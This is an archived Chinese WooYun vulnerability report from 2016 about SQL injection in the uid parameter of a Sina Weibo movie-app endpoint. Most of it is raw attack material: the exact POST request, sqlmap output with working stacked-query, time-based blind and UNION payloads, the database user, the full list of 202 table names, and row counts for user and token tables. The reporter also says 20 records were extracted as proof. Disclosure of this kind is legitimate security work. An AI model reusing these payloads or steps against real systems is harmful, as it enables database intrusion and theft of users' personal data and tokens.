乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-23: 细节已通知厂商并且等待厂商处理中 2016-03-23: 厂商已经确认,细节仅向厂商公开 2016-04-02: 细节向核心白帽子及相关领域专家公开 2016-04-12: 细节向普通白帽子公开 2016-04-22: 细节向实习白帽子公开 2016-05-07: 细节向公众公开
我发4我是午休起来刷微博看piapia酱的,不信你看44444444444444444444444444444444444444444444
注入点:
POST /movieapp/mesdk/myticketlist HTTP/1.1Host: movie.weibo.comUser-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 21type=0&uid=inject here
sqlmap resumed the following injection point(s) from stored session:---Parameter: uid (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: type=0&uid=2806387901;(SELECT * FROM (SELECT(SLEEP(5)))FOPZ)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: type=0&uid=2806387901 AND (SELECT * FROM (SELECT(SLEEP(5)))CrcV) Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: type=0&uid=2806387901 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x41735366556276724f486866714c644f4f44626b5375476c73795464667a4f4152567a4b4a546474,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----database management system users [1]: [*] 'musiclib_r'@'10.73.%'available databases [3]: [*] information_schema[*] musiclib[*] test
本来我就想这么交的,然后不小心手贱了下202张表
Database: musiclib [202 tables]+---------------------------------------+| artist_match_name || cinema_area || cinema_baseinfo || cinema_screenings || cinema_tag || cinema_tag_mapcheck || firehose_info || mingxing_activity || mingxing_userflower || movie_admin_page || movie_answers || movie_app_push_task || movie_app_realtime_push || movie_app_user || movie_app_user_token || movie_article || movie_artist || movie_box_office || movie_box_office_poll || movie_convert_callback || movie_coupon || movie_coupon_backup || movie_customize || movie_dialogue || movie_dialogue_pic || movie_dictionary || movie_emotion || movie_event_schedule || movie_film || movie_film_old || movie_film_promote || movie_filmtopic || movie_focus || movie_foreign_comment || movie_friendfeed || movie_game_rank || movie_game_seek_reply || movie_game_tools || movie_gewala_buy || movie_group_comment_report || movie_group_user || movie_hashdata || movie_hottopic || movie_nativebanner || movie_newsinfo || movie_object_relation || movie_pagepoll || movie_photo || movie_place_sale || movie_poll_daily_detail || movie_poll_detail || movie_poll_detail_hot || movie_poll_manul || movie_proterty || movie_question_type || movie_questions || movie_relation || movie_relation_page || movie_ticket || movie_user_still || movie_video || movieapp_photo || open_api_info || open_api_tree || open_group || open_group_api_map || open_user || raw_album || raw_cinema_mapcheck || raw_map_check || raw_movie || raw_movie_artist_map || raw_movie_douban_pic || raw_movie_map || raw_mv || raw_mv_recommend || raw_podcast || raw_podcast_column || raw_podcast_map || raw_podcast_program || raw_singer || raw_song || raw_song_0 || raw_song_1 || raw_song_10 || raw_song_11 || raw_song_12 || raw_song_13 || raw_song_14 || raw_song_15 || raw_song_16 || raw_song_17 || raw_song_18 || raw_song_19 || raw_song_2 || raw_song_20 || raw_song_21 || raw_song_22 || raw_song_23 || raw_song_3 || raw_song_4 || raw_song_5 || raw_song_6 || raw_song_7 || raw_song_8 || raw_song_9 || raw_song_match || raw_source || res_ad || res_album || res_album_song_map || res_artist || res_artist_album_map || res_artist_song_map || res_asiapoll_blacklist || res_band || res_card_info || res_celebrity_songlist || res_chinasong_manul || res_comm_item || res_common_banner || res_copyright || res_copyright_album_map || res_copyright_artist_map || res_copyright_song_map || res_country || res_coupon_a || res_famous_songlist || res_feedback || res_film_bonus || res_film_coupon || res_focus || res_friendfeed || res_hashdata || res_hotweibo || res_hotweibo_new || res_interface_test || res_keyword_queue || res_language || res_language_album_map || res_language_artist_map || res_language_song_map || res_log || res_lyric || res_merge_log || res_music_style || res_musician_group || res_musician_page || res_musicstyle_album_map || res_musicstyle_artist_map || res_musicstyle_song_map || res_musictopic || res_nativebanner || res_object_creator_mblog || res_page_layout || res_page_render_map || res_page_rule_set || res_pagepoll || res_party_song || res_party_user_action || res_party_user_video || res_relation_store || res_reservation || res_right_card_map || res_right_card_model || res_s3_log || res_search_watch || res_share_text_map || res_song || res_song_audio || res_song_countinfo || res_song_ext || res_song_outter_00 || res_song_outter_01 || res_song_outter_02 || res_song_outter_03 || res_song_outter_04 || res_song_outter_05 || res_song_outter_06 || res_song_outter_07 || res_song_outter_08 || res_song_outter_09 || res_song_outter_0a || res_song_outter_0b || res_song_outter_0c || res_song_outter_0d || res_song_outter_0e || res_song_outter_0f || res_song_ringtone || res_songautopush_event || res_square_point_uid || res_timing_job || res_topic_monitor || res_uidlist || res_update_film || res_update_song || res_user || res_user_rate || res_usergroup || song_match_name || song_mv_map || xunlongjue_message |+---------------------------------------+
其中movie_app_user和movie_app_user_token分别38万数据和13万
Database: musiclib+----------------+---------+| Table | Entries |+----------------+---------+| movie_app_user | 385824 |+----------------+---------+Database: musiclib+----------------------+---------+| Table | Entries |+----------------------+---------+| movie_app_user_token | 139005 |+----------------------+---------+
吓死苯宝宝了
我脱了20条数据证明下
全程只脱了20条数据证明危害,并没有脱裤
多多指教(想送我礼物我是不会介意的)
危害等级:高
漏洞Rank:10
确认时间:2016-03-23 17:39
感谢关注新浪安全,问题修复中。
暂无
